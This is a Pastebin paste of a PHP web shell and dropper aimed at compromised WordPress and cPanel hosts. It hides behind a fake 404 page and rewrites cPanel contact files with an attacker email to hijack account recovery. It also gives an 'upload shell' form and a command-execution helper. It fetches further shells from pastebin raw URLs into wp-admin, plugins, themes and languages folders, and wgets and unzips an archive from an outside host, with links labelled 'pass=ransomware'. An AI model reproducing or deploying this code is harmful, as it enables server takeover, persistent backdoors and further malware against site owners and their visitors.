Advertisement
dragondevile

Untitled

Sep 16th, 2017
371
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. $azerty = $_SERVER["SERVER_NAME"];
  2. $abcd = dirname($_SERVER["PHP_SELF"]);
  3. $sexterss = $azerty.$abcd;
  4. $azzouz = $_SERVER['HTTP_HOST'];
  5. echo'<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL files was not found on this server.</p><h2 hidden>dddddd@hotmail.com</h2>
  6. <p>Additionally, a 404 error Not Found was encountered while trying to use an ErrorDocument to handle the request.</p>';
  7. $filt = getcwd();
  8. $fuck = explode("/",$filt);
  9. $user = $fuck[2];
  10. $email = "dexterkh1212x@gmail.com";
  11. $wr = 'email:'.$email;
  12. $f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w');
  13. fwrite($f, $wr);fclose($f);$f = fopen('/home/'.$user.'/.contactinfo', 'w');fwrite($f, $wr); fclose($f);
  14. if(isset($_GET['user'])){echo "<br><br><font color='red'>$user</font><br><br>";}
  15. if(isset($_GET['kill'])){$a = basename($_SERVER['SCRIPT_NAME']);echo "<br><font color='blue'>GIF89a</font>";unlink($a);}
  16. if(isset($_GET['upload'])){
  17. echo "<center><br><input onclick="."location.href='?kill';"." type='button' value='Supprimer'><br><br><br>";
  18. $nemoshell = $_FILES['file']['name'];$nemohero  = $_FILES['file']['tmp_name'];
  19. echo "<form method='POST' enctype='multipart/form-data'><input type='file'name='file' /><input type='submit' value='upload shell' /></form>";
  20. move_uploaded_file($nemohero,$nemoshell);echo" <a href='$nemoshell' target='_blank'>$nemoshell</a></center>";
  21. }
  22. function exe($cmd) {
  23.     if(function_exists("system")) {        
  24.         @ob_start();       
  25.         @system($cmd);     
  26.         $buff = @ob_get_contents();        
  27.         @ob_end_clean();       
  28.         return $buff;  
  29.     } elseif(function_exists("exec")) {        
  30.         @exec($cmd,$results);      
  31.         $buff = "";        
  32.         foreach($results as $result) {         
  33.             $buff .= $result;      
  34.         } return $buff;    
  35.     } elseif(function_exists("passthru")) {        
  36.         @ob_start();       
  37.         @passthru($cmd);       
  38.         $buff = @ob_get_contents();        
  39.         @ob_end_clean();       
  40.         return $buff;  
  41.     } elseif(function_exists("shell_exec")) {      
  42.         $buff = @shell_exec($cmd);     
  43.         return $buff;  
  44.     }
  45. }
  46. $input = array('leopard','lion','male','cock','drake','penguin','quail','rat','serval','swan','bear','baboon','alpaca','zebra','yak','wolf','turkey','toad','baby','calf','cria','chick','fawn','pup','kit','nymph','swarm');
  47. $rand_keys = array_rand($input, 2);
  48. $random = $input[$rand_keys[0]];
  49. $leaf = $random;
  50. $system = $random;
  51. $tacos = $random;
  52. echo "<center>";
  53. if(isset($_GET['get'])){
  54. $output = 'https://pastebin.com/raw/wL527WWg';
  55. $st = curl_init();
  56. curl_setopt($st,CURLOPT_URL,$output);
  57. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
  58. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
  59. $html = curl_exec($st);
  60. curl_close($st);
  61. $a1=fopen('output.php','w');
  62. fwrite($a1,$html);
  63. $authorze = 'https://pastebin.com/raw/nxJA9qiA';
  64. $st = curl_init();
  65. curl_setopt($st,CURLOPT_URL,$authorze);
  66. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
  67. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
  68. $html = curl_exec($st);
  69. curl_close($st);
  70. $a2=fopen('authorze.php','w');
  71. fwrite($a2,$html);
  72. $views = 'https://pastebin.com/raw/jWBjgLd2';
  73. $st = curl_init();
  74. curl_setopt($st,CURLOPT_URL,$views);
  75. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
  76. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
  77. $html = curl_exec($st);
  78. curl_close($st);
  79. $a3=fopen('views.php','w');
  80. fwrite($a3,$html);
  81. echo "<a href="."http://$sexterss/authorze.php"." target="."_blank".">$sexterss/authorze.php"."</a><br>";
  82. echo "<a href="."http://$sexterss/views.php?pass=ransomware"." target="."_blank".">$sexterss/views.php?pass=ransomware"."</a><br>";
  83. echo "<a href="."http://$sexterss/output.php"." target="."_blank".">$sexterss/output.php"."</a><br>";
  84. }  
  85. $sss=array('./','../','../../','../../../','../../../../','../../../../../','../../../../../../');
  86. foreach($sss as $pa){
  87. if(isset($_GET['mailer'])){
  88. $p1=array("$pa/wp-admin/user/");
  89. foreach($p1 as $path){ 
  90. if (file_exists("$path")){
  91. $print = $path.$leaf.rand(999, 123).".php";
  92. $url = 'https://pastebin.com/raw/jWBjgLd2';
  93. $st = curl_init();
  94. curl_setopt($st,CURLOPT_URL,$url);
  95. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
  96. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
  97. $html = curl_exec($st);
  98. curl_close($st);
  99. $save=fopen($print,'w');
  100. fwrite($save,$html);
  101. $print = "__$print";
  102. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
  103. echo "<a href="."http://$azzouz/$print?pass=ransomware"." target="."_blank".">$azzouz/$print"."</a><br>";
  104. break;
  105. }
  106. $p2=array("$pa/wp-content/plugins/");
  107. foreach($p2 as $path){
  108. if (file_exists("$path")){
  109. $print = $path.$leaf.rand(999, 123).".php";
  110. $url = 'https://pastebin.com/raw/jWBjgLd2';
  111. $st = curl_init();
  112. curl_setopt($st,CURLOPT_URL,$url);
  113. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
  114. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
  115. $html = curl_exec($st);
  116. curl_close($st);
  117. $save=fopen($print,'w');
  118. fwrite($save,$html);   
  119. $print = "__$print";
  120. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
  121. echo "<a href="."http://$azzouz/$print?pass=ransomware"." target="."_blank".">$azzouz/$print"."</a><br>";
  122. }}
  123. }}
  124. //////
  125. if(isset($_GET['shell1'])){
  126. $p3=array("$pa/wp-admin/network/");
  127. foreach($p3 as $path){ 
  128. if (file_exists("$path")){
  129. $print = $path.$system.rand(999, 123).".php";
  130. $url = 'https://pastebin.com/raw/nxJA9qiA';
  131. $st = curl_init();
  132. curl_setopt($st,CURLOPT_URL,$url);
  133. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
  134. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
  135. $html = curl_exec($st);
  136. curl_close($st);
  137. $save=fopen($print,'w');
  138. fwrite($save,$html);   
  139. $print = "__$print";
  140. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
  141. echo "<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
  142. break;
  143. }
  144. $p4=array("$pa/wp-content/languages/");
  145. foreach($p4 as $path){
  146. if (file_exists("$path")){
  147. $print = $path.$system.rand(999, 123).".php";
  148. $url = 'https://pastebin.com/raw/nxJA9qiA';
  149. $st = curl_init();
  150. curl_setopt($st,CURLOPT_URL,$url);
  151. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
  152. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
  153. $html = curl_exec($st);
  154. curl_close($st);
  155. $save=fopen($print,'w');
  156. fwrite($save,$html);   
  157. $print = "__$print";
  158. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
  159. echo "<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
  160. }}
  161. }}
  162. //////
  163. $p5=array("$pa/wp-content/themes/");
  164. if(isset($_GET['shell2'])){
  165. foreach($p5 as $path){ 
  166. if (file_exists("$path")){
  167. $print = $path.$tacos.rand(999, 123).".php";
  168. $url = 'https://pastebin.com/raw/wL527WWg';
  169. $st = curl_init();
  170. curl_setopt($st,CURLOPT_URL,$url);
  171. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
  172. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
  173. $html = curl_exec($st);
  174. curl_close($st);
  175. $save=fopen($print,'w');
  176. fwrite($save,$html);   
  177. $print = "__$print";
  178. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
  179. echo "<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
  180. break;
  181. }
  182. $p6=array("$pa/wp-admin/");
  183. foreach($p6 as $path){
  184. if (file_exists("$path")){
  185. $print = $path.$tacos.rand(999, 123).".php";
  186. $url = 'https://pastebin.com/raw/wL527WWg';
  187. $st = curl_init();
  188. curl_setopt($st,CURLOPT_URL,$url);
  189. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
  190. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
  191. $html = curl_exec($st);
  192. curl_close($st);
  193. $save=fopen($print,'w');
  194. fwrite($save,$html);
  195. $print = "__$print";
  196. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
  197. echo "<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
  198. }}
  199. }
  200. }
  201. }
  202. if(isset($_GET['unzip'])){
  203. exe("wget http://batut.com.ua/misc/farbtastic/ms-authorze.zip");
  204. exe("unzip ms-authorze.zip");
  205. echo "<a href="."http://$sexterss/wp-authorze.php"." target="."_blank".">$sexterss/wp-authorze.php"."</a><br>";
  206. echo "<a href="."http://$sexterss/wp-views.php?pass=ransomware"." target="."_blank".">$sexterss/wp-views.php?pass=ransomware"."</a><br>";
  207. echo "<a href="."http://$sexterss/wp-output.php"." target="."_blank".">$sexterss/wp-output.php"."</a><br>";
  208. unlink("ms-authorze.zip");
  209. echo "</center>";
  210. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement